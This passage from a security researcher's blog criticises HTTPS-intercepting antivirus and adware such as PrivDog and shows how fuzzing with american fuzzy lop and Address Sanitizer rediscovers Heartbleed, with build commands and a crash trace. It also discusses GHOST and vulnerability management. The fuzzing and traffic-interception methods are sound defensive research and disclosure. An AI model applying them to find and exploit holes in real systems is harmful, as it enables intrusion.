There's one more interesting thing: Both Kaspersky and Avast don't intercept traffic when Extended Validation (EV) certificates are used. Extended Validation certificates are the ones that show you a green bar in the address line of the browser with the company name. The reason why they do so is obvious: Using the interception certificate would remove the green bar which users might notice and find worrying. The message the Antivirus companies are sending seems clear: If you want to deliver malware from a web page you should buy an Extended Validation certificate.

Everyone gets HTTPS interception wrong - just don't do it

So what do we make out of this? A lot of software products intercept HTTPS traffic (antiviruses, adware, youth protection filters, ...), many of them promise more security and everyone gets it wrong.

I think these technologies are a misguided approach. The problem is not that they make mistakes in implementing these technologies, I think the idea is wrong from the start. Man in the Middle used to be a description of an attack technique. It seems strange that it turned into something people consider a legitimate security technology. Filtering should happen on the endpoint or not at all. Browsers do a lot these days to make your HTTPS connections more secure. Please don't mess with that.

I question the value of Antivirus software in a very general sense, I think it's an approach that has very fundamental problems in itself and often causes more harm than good. But at the very least they should try not to harm other working security mechanisms.

(You may also want to read this EFF blog post: Dear Software Vendors: Please Stop Trying to Intercept Your Customers’ Encrypted Traffic)

Tuesday, April 7. 2015

How Heartbleed could've been found

tl;dr With a reasonably simple fuzzing setup I was able to rediscover the Heartbleed bug. This uses state-of-the-art fuzzing and memory protection technology (american fuzzy lop and Address Sanitizer), but it doesn't require any prior knowledge about specifics of the Heartbleed bug or the TLS Heartbeat extension. We can learn from this to find similar bugs in the future.

Exactly one year ago a bug in the OpenSSL library became public that is one of the most well-known security bugs of all time: Heartbleed. It is a bug in the code of a TLS extension that up until then was hardly known to anybody. A read buffer overflow allowed an attacker to extract parts of the memory of every server using OpenSSL.

Can we find Heartbleed with fuzzing?

Heartbleed was introduced in OpenSSL 1.0.1, which was released in March 2012, two years earlier. Many people wondered how it could've been hidden there for so long. David A. Wheeler wrote an essay discussing how fuzzing and memory protection technologies could've detected Heartbleed. It covers many aspects in detail, but in the end he only offers speculation on whether or not fuzzing would have found Heartbleed. So I wanted to try it out.

Of course it is easy to find a bug if you know what you're looking for. As best as reasonably possible I tried not to use any specific information I had about Heartbleed. I created a setup that's reasonably simple and similar to what someone would try without knowing anything about the specifics of Heartbleed.

Heartbleed is a read buffer overflow. What that means is that an application is reading outside the boundaries of a buffer. For example, imagine an application has a space in memory that's 10 bytes long. If the software tries to read 20 bytes from that buffer, you have a read buffer overflow. It will read whatever is in the memory located after the 10 bytes. These bugs are fairly common and the basic concept of exploiting buffer overflows is pretty old. Just to give you an idea how old: Recently the Chaos Computer Club celebrated the 30th anniversary of a hack of the German BtX-System, an early online service. They used a buffer overflow that was in many aspects very similar to the Heartbleed bug. (It is actually disputed if this is really what happened, but it seems reasonably plausible to me.)
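The 10-byte example can be simulated in a few lines. Python itself checks bounds, so this sketch models process memory as one flat byte array in which unrelated data happens to sit right behind the buffer. The layout, the contents and the function names are invented for illustration; this is not OpenSSL's code.

```python
# Simulated process memory: a 10-byte buffer directly followed by unrelated data.
memory = bytearray(b"0123456789" + b"SECRET-KEY")
BUF_START, BUF_LEN = 0, 10


def unchecked_read(claimed_len: int) -> bytes:
    """Trusts the caller-supplied length, like the vulnerable pattern."""
    return bytes(memory[BUF_START:BUF_START + claimed_len])


def checked_read(claimed_len: int) -> bytes:
    """Refuses to read past the end of the buffer."""
    if claimed_len > BUF_LEN:
        raise ValueError("requested length exceeds buffer size")
    return bytes(memory[BUF_START:BUF_START + claimed_len])


print(unchecked_read(20))  # b'0123456789SECRET-KEY'
```

Note that the unchecked read does not crash. It silently returns whatever lies behind the buffer, which is why such bugs can stay unnoticed for a long time.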

Fuzzing is a widely used strategy to find security issues and bugs in software. The basic idea is simple: Give the software lots of inputs with small errors and see what happens. If the software crashes you likely found a bug.
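A minimal sketch of that basic idea, assuming a made-up toy parser as the target: take one valid input, change a single byte at random, run the target and record every input that makes it fail. The parser, its deliberate bug and all names are hypothetical.

```python
import random


def parse_record(data: bytes) -> bytes:
    """Toy target (hypothetical): the first byte is a length, the rest is the payload."""
    length = data[0]
    payload = data[1:]
    # Bug: the length field is trusted; indexing past the payload raises IndexError.
    return bytes(payload[i] for i in range(length))


def mutate(sample: bytes, rng: random.Random) -> bytes:
    """Overwrite one randomly chosen byte with a random value."""
    out = bytearray(sample)
    out[rng.randrange(len(out))] = rng.randrange(256)
    return bytes(out)


def fuzz(seed_input: bytes, rounds: int, rng: random.Random) -> list:
    """Return the mutated inputs that made the target raise."""
    crashes = []
    for _ in range(rounds):
        candidate = mutate(seed_input, rng)
        try:
            parse_record(candidate)
        except IndexError:
            crashes.append(candidate)
    return crashes


crashes = fuzz(b"\x03abc", rounds=1000, rng=random.Random(0))
print(len(crashes), "crashing inputs found")
```

Here the Python exception plays the role of the crash. With a C program a fuzzer would watch for signals such as a segmentation fault instead.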

When buffer overflows happen an application doesn't always crash. Often it will just read (or write if it is a write overflow) to the memory that happens to be there. Whether it crashes depends on a lot of circumstances. Most of the time read overflows won't crash your application. That's also the case with Heartbleed. There are a couple of technologies that improve the detection of memory access errors like buffer overflows. An old and well-known one is the debugging tool Valgrind. However Valgrind slows down applications a lot (around 20 times slower), so it is not really well suited for fuzzing, where you want to run an application millions of times on different inputs.

Address Sanitizer finds more bugs

A better tool for our purpose is Address Sanitizer. David A. Wheeler calls it “nothing short of amazing”, and I want to reiterate that. I think it should be a tool that every C/C++ software developer should know and should use for testing.

Address Sanitizer is part of the C compiler and has been included into the two most common compilers in the free software world, gcc and llvm. To use Address Sanitizer one has to recompile the software with the command line parameter -fsanitize=address . It slows down applications, but only by a relatively small amount. According to their own numbers an application using Address Sanitizer is around 1.8 times slower. This makes it feasible for fuzzing tasks.



For the fuzzing itself a tool that recently gained a lot of popularity is american fuzzy lop (afl). This was developed by Michal Zalewski from the Google security team, who is also known by his nick name lcamtuf. As far as I'm aware the approach of afl is unique. It adds instructions to an application during the compilation that allow the fuzzer to detect new code paths while running the fuzzing tasks. If a new interesting code path is found then the sample that created this code path is used as the starting point for further fuzzing.
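The feedback loop described above can be sketched as a toy. This is not how afl is implemented: afl instruments the compiled binary, while the hypothetical target below simply reports which of its branches were reached. The point is only the loop itself, where an input that reaches something new is kept and mutated further.

```python
import random


def target(data: bytes) -> set:
    """Toy target (hypothetical) that reports which branches it reached."""
    reached = {"start"}
    if len(data) > 0 and data[0] == ord("T"):
        reached.add("T")
        if len(data) > 1 and data[1] == ord("L"):
            reached.add("TL")
            if len(data) > 2 and data[2] == ord("S"):
                reached.add("TLS")
    return reached


def coverage_guided_fuzz(seed: bytes, rounds: int, rng: random.Random):
    """Mutate queued inputs; keep every input that reaches a branch not seen before."""
    queue = [seed]
    seen = set(target(seed))
    for _ in range(rounds):
        parent = rng.choice(queue)
        child = bytearray(parent)
        child[rng.randrange(len(child))] = rng.randrange(256)
        new_branches = target(bytes(child)) - seen
        if new_branches:
            seen |= new_branches
            queue.append(bytes(child))
    return seen, queue


seen, queue = coverage_guided_fuzz(b"AAA", rounds=200000, rng=random.Random(0))
print(sorted(seen))
print(queue)
```

Without the feedback the innermost branch would require guessing three specific bytes at once. With it, each correct byte is found and kept separately, which is what makes this approach effective on nested input checks.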

Currently afl only uses file inputs and cannot directly fuzz network input. OpenSSL has a command line tool that allows all kinds of file inputs, so you can use it for example to fuzz the certificate parser. But this approach does not allow us to directly fuzz the TLS connection, because that only happens on the network layer. By fuzzing various file inputs I recently found two issues in OpenSSL, but both had been found by Brian Carpenter before, who at the same time was also fuzzing OpenSSL.

Let OpenSSL talk to itself

So to fuzz the TLS network connection I had to create a workaround. I wrote a small application that creates two instances of OpenSSL that talk to each other. This application doesn't do any real networking, it is just passing buffers back and forth and thus doing a TLS handshake between a server and a client. Each message packet is written down to a file. It will result in six files, but the last two are just empty, because at that point the handshake is finished and no more data is transmitted. So we have four files that contain actual data from a TLS handshake. If you want to dig into this, a good description of a TLS handshake is provided by the developers of OCaml-TLS and MirageOS.

Then I added the possibility of replacing parts of the handshake messages with files I pass on the command line. By calling my test application selftls with a number and a filename a handshake message gets replaced by this file. So to test just the first part of the server handshake I'd call the test application, take the output file packet-1 and pass it back again to the application by running selftls 1 packet-1. Now we have all the pieces we need to use american fuzzy lop and fuzz the TLS handshake.

I compiled OpenSSL 1.0.1f, the last version that was vulnerable to Heartbleed, with american fuzzy lop. This can be done by calling ./config and then replacing gcc in the Makefile with afl-gcc. Also we want to use Address Sanitizer, to do so we have to set the environment variable AFL_USE_ASAN to 1.

There are some issues when using Address Sanitizer with american fuzzy lop. Address Sanitizer needs a lot of virtual memory (many Terabytes). American fuzzy lop limits the amount of memory an application may use. It is not trivially possible to only limit the real amount of memory an application uses and not the virtual amount, therefore american fuzzy lop cannot handle this flawlessly. Different solutions for this problem have been proposed and are currently being developed. I usually go with the simplest solution: I just disable the memory limit of afl (parameter -m -1). This poses a small risk: A fuzzed input may lead an application to a state where it will use all available memory and thereby cause other applications on the same system to malfunction. Based on my experience this is very rare, so I usually just ignore that potential problem.

After having compiled OpenSSL 1.0.1f we have two files libssl.a and libcrypto.a. These are static versions of OpenSSL and we will use them for our test application. We now also use the afl-gcc to compile our test application:

AFL_USE_ASAN=1 afl-gcc selftls.c -o selftls libssl.a libcrypto.a -ldl

Now we run the application. It needs a dummy certificate. I have put one in the repo. To make things faster I'm using a 512 bit RSA key. This is completely insecure, but as we don't want any security here – we just want to find bugs – this is fine, because a smaller key makes things faster. However if you want to try fuzzing the latest OpenSSL development code you need to create a larger key, because it'll refuse to accept such small keys.

The application will give us six packet files, however the last two will be empty. We only want to fuzz the very first step of the handshake, so we're interested in the first packet. We will create an input directory for american fuzzy lop called in and place packet-1 in it. Then we can run our fuzzing job:

afl-fuzz -i in -o out -m -1 -t 5000 ./selftls 1 @@

We pass the input and output directory, disable the memory limit and increase the timeout value, because TLS handshakes are slower than common fuzzing tasks. On my test machine around 6 hours later afl found the first crash. Now we can manually pass our output to the test application and will get a stack trace by Address Sanitizer:

==2268==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x629000013748 at pc 0x7f228f5f0cfa bp 0x7fffe8dbd590 sp 0x7fffe8dbcd38

READ of size 32768 at 0x629000013748 thread T0

#0 0x7f228f5f0cf9 (/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.2/libasan.so.1+0x2fcf9)

#1 0x43d075 in memcpy /usr/include/bits/string3.h:51

#2 0x43d075 in tls1_process_heartbeat /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/t1_lib.c:2586

#3 0x50e498 in ssl3_read_bytes /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/s3_pkt.c:1092

#4 0x51895c in ssl3_get_message /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/s3_both.c:457

#5 0x4ad90b in ssl3_get_client_hello /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/s3_srvr.c:941

#6 0x4c831a in ssl3_accept /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/s3_srvr.c:357

#7 0x412431 in main /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/selfs.c:85

#8 0x7f228f03ff9f in __libc_start_main (/lib64/libc.so.6+0x1ff9f)

#9 0x4252a1 (/data/openssl/openssl-handshake/openssl-1.0.1f-nobreakrng-afl-asan-fuzz/selfs+0x4252a1)

0x629000013748 is located 0 bytes to the right of 17736-byte region [0x62900000f200,0x629000013748)

allocated by thread T0 here:

#0 0x7f228f6186f7 in malloc (/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.2/libasan.so.1+0x576f7)

#1 0x57f026 in CRYPTO_malloc /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/crypto/mem.c:308

We can see here that the crash is a heap buffer overflow doing an invalid read access of around 32 Kilobytes in the function tls1_process_heartbeat(). It is the Heartbleed bug. We found it.

I want to mention a couple of things that I found out while trying this. I did some things that I thought were necessary, but later it turned out that they weren't. After Heartbleed hit the news a number of reports stated that Heartbleed was partly the fault of OpenSSL's memory management. A mail by Theo de Raadt claiming that OpenSSL has “exploit mitigation countermeasures” was widely quoted. I was aware of that, so I first tried to compile OpenSSL without its own memory management. That can be done by calling ./config with the option no-buf-freelist.

But it turns out that, although OpenSSL uses its own memory management, this doesn't defeat Address Sanitizer. I could replicate my fuzzing finding with OpenSSL compiled with its default options. Although it does its own allocation management, it will still do a call to the system's normal malloc() function for every new memory allocation. A blog post by Chris Rohlf digs into the details of the OpenSSL memory allocator.

Breaking random numbers for deterministic behaviour

When fuzzing the TLS handshake american fuzzy lop will report a red number counting variable runs of the application. The reason for that is that a TLS handshake uses random numbers to create the master secret that's later used to derive cryptographic keys. Also the RSA functions will use random numbers. I wrote a patch to OpenSSL to deliberately break the random number generator and let it only output ones (it didn't work with zeros, because OpenSSL will wait for non-zero random numbers in the RSA function).

During my tests this had no noticeable impact on the time it took afl to find Heartbleed. Still I think it is a good idea to remove nondeterministic behavior when fuzzing cryptographic applications. Later in the handshake there are also timestamps used, this can be circumvented with libfaketime, but for the initial handshake processing that I fuzzed to find Heartbleed that doesn't matter.

Conclusion

You may ask now what the point of all this is. Of course we already know where Heartbleed is, it has been patched, fixes have been deployed and it is mostly history. It's been analyzed thoroughly.

The question has been asked if Heartbleed could've been found by fuzzing. I'm confident to say the answer is yes. One thing I should mention here however: American fuzzy lop was already available back then, but it was barely known. It only received major attention later in 2014, after Michal Zalewski used it to find two variants of the Shellshock bug. Earlier versions of afl were much less handy to use, e. g. they didn't have 64 bit support out of the box. I remember that I failed to use an earlier version of afl with Address Sanitizer, it was only possible after a couple of issues were fixed. A lot of other things have been improved in afl, so at the time Heartbleed was found american fuzzy lop probably wasn't in a state that would've allowed finding it in an easy, straightforward way.

I think the takeaway message is this: We have powerful tools freely available that are capable of finding bugs like Heartbleed. We should use them and look for the other Heartbleeds that are still lingering in our software. Take a look at the Fuzzing Project if you're interested in further fuzzing work. There are beginner tutorials that I wrote with the idea in mind to show people that fuzzing is an easy way to find bugs and improve software quality.

I already used my sample application to fuzz the latest OpenSSL code. Nothing was found yet, but of course this could be further tweaked by trying different protocol versions, extensions and other variations in the handshake.

I also wrote a German article about this finding for the IT news webpage Golem.de.

Update:

I want to point out some feedback I got that I think is noteworthy.

On Twitter it was mentioned that Codenomicon actually found Heartbleed via fuzzing. There's a Youtube video from Codenomicon's Antti Karjalainen explaining the details. However the way they did this was quite different, they built a protocol specific fuzzer. The remarkable feature of afl is that it is very powerful without knowing anything specific about the used protocol. Also it should be noted that Heartbleed was found twice, the first one was Neel Mehta from Google.

Kostya Serebryany mailed me that he was able to replicate my findings with his own fuzzer which is part of LLVM, and it was even faster.

In the comments Michele Spagnuolo mentions that by compiling OpenSSL with -DOPENSSL_TLS_SECURITY_LEVEL=0 one can use very short and insecure RSA keys even in the latest version. Of course this shouldn't be done in production, but it is helpful for fuzzing and other testing efforts.

Posted by Hanno Böck in Code, Cryptography, English, Gentoo, Linux, Security at 15:23 | Comments (3) | Trackbacks (4)

Defined tags for this entry: addresssanitizer, afl, americanfuzzylop, bufferoverflow, fuzzing, heartbleed, openssl

Sunday, March 15. 2015

Talks at BSidesHN about PGP keyserver data and at Easterhegg about TLS

Just wanted to quickly announce two talks I'll give in the upcoming weeks: One at BSidesHN (Hannover, 20th March) about some findings related to PGP and keyservers and one at the Easterhegg (Braunschweig, 4th April) about the current state of TLS.

A look at the PGP ecosystem and its keys

PGP-based e-mail encryption is widely regarded as an important tool to provide confidential and secure communication. The PGP ecosystem consists of the OpenPGP standard, different implementations (mostly GnuPG and the original PGP) and keyservers.

The PGP keyservers operate on an add-only basis. That means keys can only be uploaded and never removed. We can use these keyservers as a tool to investigate potential problems in the cryptography of PGP-implementations. Similar projects regarding TLS and HTTPS have uncovered a large number of issues in the past.

The talk will present a tool to parse the data of PGP keyservers and put them into a database. It will then have a look at potential cryptographic problems. The tools used will be published under a free license after the talk.

Update:

Source code

A look at the PGP ecosystem through the key server data (background paper)

Slides

Some tales from TLS

The TLS protocol is one of the foundations of Internet security. In recent years it's been under attack: Various vulnerabilities, both in the protocol itself and in popular implementations, showed how fragile that foundation is.

On the other hand new features allow TLS to be used in a much more secure way these days than ever before. Features like Certificate Transparency and HTTP Public Key Pinning allow us to avoid many of the security pitfalls of the Certificate Authority system.

Update: Slides and video available. Bonus: Contains rant about DNSSEC/DANE.

Slides PDF, LaTeX, Slideshare

Video recording, also on Youtube

Posted by Hanno Böck in Cryptography, English, Gentoo, Life, Linux, Security at 13:16 | Comments (0) | Trackback (1)

Defined tags for this entry: braunschweig, bsideshn, ccc, cryptography, easterhegg, encryption, hannover, pgp, security, talk, tls

Wednesday, February 25. 2015

PrivDog wants to protect your privacy - by sending data home in clear text

tl;dr PrivDog will send webpage URLs you surf to a server owned by AdTrustMedia. This happened unencrypted in cleartext HTTP. This is true for both the version that is shipped with some Comodo products and the standalone version from the PrivDog webpage.



On Sunday I wrote here that the software PrivDog had a severe security issue that compromised the security of HTTPS connections. In the meantime PrivDog has published an advisory and an update for their software. I had a look at the updated version. While I haven't found any further obvious issues in the TLS certificate validation I found others that I find worrying.

Let me quickly recap what PrivDog is all about. The webpage claims: "PrivDog protects your privacy while browsing the web and more!" What PrivDog does technically is to detect ads it considers as bad and replace them with ads delivered by AdTrustMedia, the company behind PrivDog.

I had a look at the network traffic from a system using PrivDog. It sent some JSON-encoded data to the url http://ads.adtrustmedia.com/safecheck.php. The sent data looks like this:

{"method": "register_url", "url": "https:\/\/blog.hboeck.de\/serendipity_admin.php?serendipity[adminModule]=logout", "user_guid": "686F27D9580CF2CDA8F6D4843DC79BA1", "referrer": "https://blog.hboeck.de/serendipity_admin.php", "af": 661013, "bi": 661, "pv": "3.0.105.0", "ts": 1424914287827}

{"method": "register_url", "url": "https:\/\/blog.hboeck.de\/serendipity_admin.php", "user_guid": "686F27D9580CF2CDA8F6D4843DC79BA1", "referrer": "https://blog.hboeck.de/serendipity_admin.php", "af": 661013, "bi": 661, "pv": "3.0.105.0", "ts": 1424914313848}

{"method": "register_url", "url": "https:\/\/blog.hboeck.de\/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=editSelect", "user_guid": "686F27D9580CF2CDA8F6D4843DC79BA1", "referrer": "https://blog.hboeck.de/serendipity_admin.php", "af": 661013, "bi": 661, "pv": "3.0.105.0", "ts": 1424914316235}

And from another try with the browser plugin variant shipped with Comodo Internet Security:

{"method":"register_url","url":"https:\\/\\/www.facebook.com\\/?_rdr","user_guid":"686F27D9580CF2CDA8F6D4843DC79BA1","referrer":""}

{"method":"register_url","url":"https:\\/\\/www.facebook.com\\/login.php?login_attempt=1","user_guid":"686F27D9580CF2CDA8F6D4843DC79BA1","referrer":"https:\\/\\/www.facebook.com\\/?_rdr"}

On a Linux router or host system this could be tested with a command like tcpdump -A dst ads.adtrustmedia.com|grep register_url. (I was unable to do the same on the affected system with the Windows version of tcpdump, I'm not sure why.)

Now here is the troubling part: The URLs I surf to are all sent to a server owned by AdTrustMedia. As you can see in this example these are HTTPS-protected URLs, some of them from the internal backend of my blog. In my tests all URLs the user surfed to were sent, sometimes with some delay, but not URLs of objects like iframes or images.

This is worrying for various reasons. First of all with this data AdTrustMedia could create a profile of users including all the webpages the user surfs to. Given that the company advertises this product as a privacy tool this is especially troubling, because quite obviously this harms your privacy.

This communication happened in clear text, even for URLs that are HTTPS. HTTPS does not protect metadata and a passive observer of the network traffic can always see which domains a user surfs to. But what HTTPS does encrypt is the exact URL a user is calling. Sometimes the URL can contain security sensitive data like session ids or security tokens. With PrivDog installed the HTTPS URL was no longer protected, because it was sent in cleartext through the net.
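The difference can be illustrated by taking one of the request bodies quoted above (shortened here to three fields) and splitting the reported URL into the part a passive observer of an HTTPS connection can learn anyway and the part that is normally encrypted. The variable names are only illustrative.

```python
import json
from urllib.parse import urlsplit

# One request body as quoted above, shortened to the fields used here.
body = (
    r'{"method": "register_url", '
    r'"url": "https:\/\/blog.hboeck.de\/serendipity_admin.php?serendipity[adminModule]=logout", '
    r'"user_guid": "686F27D9580CF2CDA8F6D4843DC79BA1"}'
)

record = json.loads(body)
parts = urlsplit(record["url"])

# Roughly what a passive observer of a normal HTTPS connection learns.
visible_with_https = parts.hostname
# What HTTPS normally keeps confidential: the path and the query string.
hidden_by_https = parts.path + "?" + parts.query

print("host:", visible_with_https)
print("path and query:", hidden_by_https)
print("sent along with it:", record["user_guid"])
```

Because the whole JSON body travelled over plain HTTP, the path and query string end up readable on the network together with a stable identifier for the installation.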

The TLS certificate validation issue was only present in the standalone version of PrivDog and not the version that is bundled with Comodo Internet Security as part of the Chromodo browser. However this new issue of sending URLs to an AdTrustMedia server was present in both the standalone and the bundled version.

I have asked PrivDog for a statement: "In accordance with our privacy policy all data sent is anonymous and we do not store any personally identifiable information. The API is utilized to help us prevent fraud of various types including click fraud which is a serious problem on the Internet. This allows us to identify automated bots and other threats. The data is also used to improve user experience and enables the system to deliver users an improved and more appropriate ad experience." They also said that they will update the configuration of clients to use HTTPS instead of HTTP to transmit the data.

PrivDog made further HTTP calls. Sometimes it fetched Javascript and iframes from the server trustedads.adtrustmedia.com. By manipulating these I was able to inject Javascript into webpages. However I have only experienced this with HTTP webpages. This by itself doesn't open up security issues, because an attacker able to control network traffic is already able to manipulate the content of HTTP webpages and can therefore inject JavaScript anyway. There are also other unencrypted HTTP requests to AdTrustMedia servers transmitting JSON data where I don't know what their exact meaning is.

Monday, February 23. 2015

Software Privdog worse than Superfish

tl;dr There is a software called Privdog. It totally breaks HTTPS security in a similar way as Superfish.

In case you haven't heard, in the past days an adware called Superfish made headlines. It was preinstalled on Lenovo laptops and it is bad: It totally breaks the security of HTTPS connections. The story became bigger when it became clear that a lot of other software packages were using the same technology, Komodia, with the same security risk.

What Superfish and similar tools do is intercept encrypted HTTPS traffic to insert advertising on webpages. They do so by breaking the HTTPS encryption with a Man-in-the-Middle attack, which is possible because they install their own certificate into the operating system.

A number of people gathered in a chatroom and we noted a thread on Hacker News where someone asked whether a tool called PrivDog is like Superfish. PrivDog's functionality is to replace advertising in web pages with its own advertising "from trusted sources". That by itself already sounds weird even without any security issues.

A quick analysis shows that it doesn't have the same flaw as Superfish, but it has another one which arguably is even bigger. While Superfish used the same certificate and key on all hosts PrivDog recreates a key/cert on every installation. However here comes the big flaw: PrivDog will intercept every certificate and replace it with one signed by its root key. And that means also certificates that weren't valid in the first place. It will turn your Browser into one that just accepts every HTTPS certificate out there, whether it's been signed by a certificate authority or not. We're still trying to figure out the details, but it looks pretty bad. (with some trickery you can do something similar on Superfish/Komodia, too)
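For contrast, this is roughly what the missing check looks like when the upstream connection is made with Python's standard ssl module. It is only a sketch of the principle and says nothing about how PrivDog is built internally; the two function names are made up. An intercepting proxy must verify the real server's certificate chain and hostname before it re-signs anything for the browser.

```python
import ssl


def make_upstream_context() -> ssl.SSLContext:
    """Client-side context for the proxy's own connection to the real server."""
    ctx = ssl.create_default_context()  # loads the system CA store
    # Both settings are already the defaults; they are spelled out here
    # to show what must never be switched off.
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def broken_context() -> ssl.SSLContext:
    """What accepting every certificate amounts to. Shown only for contrast."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # must be disabled before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE  # any certificate, valid or not, is accepted
    return ctx


good = make_upstream_context()
print(good.verify_mode == ssl.CERT_REQUIRED, good.check_hostname)
```

If the proxy connects upstream with the second kind of context and then presents the browser a certificate signed by its own trusted root, every invalid certificate looks valid to the user.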

There are some things that are completely weird. When one surfs to a webpage that has a self-signed certificate (really self-signed, not signed by an unknown CA) it adds another self-signed cert with 512 bit RSA into the root certificate store of Windows. All other certs get replaced by 1024 bit RSA certs signed by a locally created PrivDog CA.

US-CERT writes: "Adtrustmedia PrivDog is promoted by the Comodo Group, which is an organization that offers SSL certificates and authentication solutions." A variant of PrivDog that is not affected by this issue is shipped with products produced by Comodo (see below). This makes this case especially interesting because Comodo itself is a certificate authority (they had issues before). As ACLU technologist Christopher Soghoian points out on Twitter the founder of PrivDog is the CEO of Comodo. (See this blog post.)

We will try to collect information on this and other similar software in a Wiki on Github. Discussions also happen on irc.ringoflightning.net #kekmodia.

Thanks to Filippo, slipstream / raylee and others for all the analysis that has happened on this issue.

Update/Clarification: The dangerous TLS interception behaviour is part of the latest version of PrivDog 3.0.96.0, which can be downloaded from the PrivDog webpage. Comodo Internet Security bundles an earlier version of PrivDog that works with a browser extension, so it is not directly vulnerable to this threat. According to online sources PrivDog 3.0.96.0 was released in December 2014 and changed the TLS interception technology.

Update 2: Privdog published an Advisory.

Friday, January 30. 2015

What the GHOST tells us about free software vulnerability management

GHOST itself is a Heap Overflow in the name resolution function of the Glibc. The Glibc is the standard C library on Linux systems, almost every software that runs on a Linux system uses it. It is somewhat unclear right now how serious GHOST really is. A lot of software uses the affected function gethostbyname(), but a lot of conditions have to be met to make this vulnerability exploitable. Right now the most relevant attack is against the mail server exim where Qualys has developed a working exploit which they plan to release soon. There have been speculations whether GHOST might be exploitable through Wordpress, which would make it much more serious.
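As a rough illustration, the following Python sketch checks whether the running glibc falls into the upstream version range that contains the bug. The range used here (2.2 up to and including 2.17, fixed in 2.18) is taken from the Qualys advisory, not from this post, and the function names are made up. Note that the check only reflects upstream version numbers: a distribution may ship an old version number with the fix backported, or a patched package may still report an "affected" version.

```python
import platform
import re

# Assumption from the Qualys advisory: upstream glibc 2.2 through 2.17
# contain the bug, 2.18 contains the fix.
FIRST_AFFECTED = (2, 2)
FIRST_FIXED = (2, 18)


def parse_version(text: str) -> tuple:
    """Turn a string like '2.17' into (2, 17), ignoring any suffix."""
    match = re.match(r"(\d+)\.(\d+)", text)
    if match is None:
        raise ValueError("not a glibc version: %r" % text)
    return int(match.group(1)), int(match.group(2))


def upstream_glibc_affected(version: str) -> bool:
    """True if this upstream version number lies in the affected range."""
    return FIRST_AFFECTED <= parse_version(version) < FIRST_FIXED


if __name__ == "__main__":
    lib, version = platform.libc_ver()
    if lib == "glibc" and version:
        print(version, "affected upstream:", upstream_glibc_affected(version))
    else:
        print("not running on glibc, or version could not be determined")
```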

Technically GHOST is a heap overflow, which is a very common bug in C programming. C is inherently prone to these kinds of memory corruption errors and there are essentially two things here to move forwards: Improve the use of exploit mitigation techniques like ASLR and create new ones (levee is an interesting project, watch this 31C3 talk). And if possible move away from C altogether and develop core components in memory safe languages (I have high hopes for the Mozilla Servo project, watch this linux.conf.au talk).

GHOST was discovered three times

But the thing I want to elaborate here is something different about GHOST: It turns out that it has been discovered independently three times. It was already fixed in 2013 in the Glibc Code itself. The commit message didn't indicate that it was a security vulnerability. Then in early 2014 developers at Google found it again using Address Sanitizer (which – by the way – tells you that all software developers should use Address Sanitizer more often to test their software). Google fixed it in Chrome OS and explicitly called it an overflow and a vulnerability. And then recently Qualys found it again and made it public.

Now you may wonder why a vulnerability fixed in 2013 made headlines in 2015. The reason is that many systems never received the fix, because it wasn't publicly known that the bug was serious. I don't think there was any malicious intent. The original Glibc fix was probably done without anyone noticing that it is serious and the Google devs may have thought that the fix is already public, so they don't need to make any noise about it. But we can clearly see that something doesn't work here. Which brings us to a discussion of how the Linux and free software world in general and vulnerability management in particular work.

The “Never touch a running system” principle

Quite early when I came in contact with computers I heard the phrase “Never touch a running system”. This may have been a reasonable approach to IT systems back then when computers usually weren't connected to any networks and when remote exploits weren't a thing, but it certainly isn't a good idea today in a world where almost every computer is part of the Internet. Because once new security vulnerabilities become public you should change your system and fix them. However that doesn't change the fact that many people still operate like that.

A number of Linux distributions provide “stable” or “Long Term Support” versions. Basically the idea is this: At some point they take the current state of their systems and further updates will only contain important fixes and security updates. They guarantee to fix security vulnerabilities for a certain time frame. This is kind of a compromise between the “Never touch a running system” approach and reasonable security. It tries to give you a system that will basically stay the same, but you get fixes for security issues. Popular examples for this approach are the stable branch of Debian, Ubuntu LTS versions and the Enterprise versions of Red Hat and SUSE.

To give you an idea about time frames, Debian currently supports the stable trees Squeeze (6.0), which was released in 2011, and Wheezy (7.0), which was released in 2013. Red Hat Enterprise Linux currently has 4 supported versions (4, 5, 6, 7), the oldest one was originally released in 2005. So we're talking about pretty long time frames that these systems get supported. Ubuntu and SUSE have similar long term supported systems.

These systems are delivered with an implicit promise: We will take care of security and if you update regularly you'll have a system that doesn't change much, but that will be secure against known threats. Now the interesting question is: How well do these systems deliver on that promise and how hard is that?

Vulnerability management is chaotic and fragile

I'm not sure how many people are aware how vulnerability management works in the free software world. It is a pretty fragile and chaotic process. There is no standard way things work. The information is scattered around many different places. Different people look for vulnerabilities for different reasons. Some are developers of the respective projects themselves, some are companies like Google that make use of free software projects, some are just curious people interested in IT security or researchers. They report a bug through the channels of the respective project. That may be a mailing list, a bug tracker or just a direct mail to the developer. Hopefully the developers fix the issue. It does happen that the person finding the vulnerability first has to explain to the developer why it actually is a vulnerability. Sometimes the fix will happen in a public code repository, sometimes not. Sometimes the developer will mention that it is a vulnerability in the commit message or the release notes of the new version, sometimes not. There are notorious projects that refuse to handle security vulnerabilities in a transparent way. Sometimes whoever found the vulnerability will post more information on his/her blog or on a mailing list like full disclosure or oss-security. Sometimes not. Sometimes vulnerabilities get a CVE id assigned, sometimes not.

Add to that the fact that in many cases it's far from clear what is a security vulnerability. It is absolutely common that if you ask the people involved whether this is serious the best and most honest answer they can give is “we don't know”. And very often bugs get fixed without anyone noticing that it even could be a security vulnerability.

Then there are projects where the number of security vulnerabilities found and fixed is really huge. The latest Chrome 40 release had 62 security fixes, version 39 had 42. Chrome releases a new version every two months. Browser vulnerabilities are found and fixed on a daily basis. Not that extreme but still high is the vulnerability count in PHP, which is especially worrying if you know that many webhosting providers run PHP versions not supported any more.

